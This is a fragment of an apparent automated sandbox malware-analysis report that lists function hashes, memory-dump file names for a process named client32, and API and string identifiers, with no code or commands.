                                                                              • Instruction ID: 75955eb5d3bdaa86fb34179760e08c08bc775c18ff6c0b8e66661a9f5e9df206
                                                                              • Opcode Fuzzy Hash: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                              • Instruction Fuzzy Hash: 18D022B1D00235ABC700D662EC4ABC9F2C49B09318F004076F03666004E2B4E4808384
                                                                              Function 1115B910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MenuProp
                                                                              • String ID: OldMenu
                                                                              • API String ID: 601939786-3235417843
                                                                              • Opcode ID: b2ae159b91161bc5121d418d4eba0eb432953fd9fc1df4eba921856773b07696
                                                                              • Instruction ID: 00d1d82ffe912eb1f0033c226aa13db8fbf5a9b0d38ca05e3ef3a03686f26a50
                                                                              • Opcode Fuzzy Hash: b2ae159b91161bc5121d418d4eba0eb432953fd9fc1df4eba921856773b07696
                                                                              • Instruction Fuzzy Hash: CBC0123214257DA782016A95DD44DCBFB6DEE0A1557044022F520D2401E721551047E9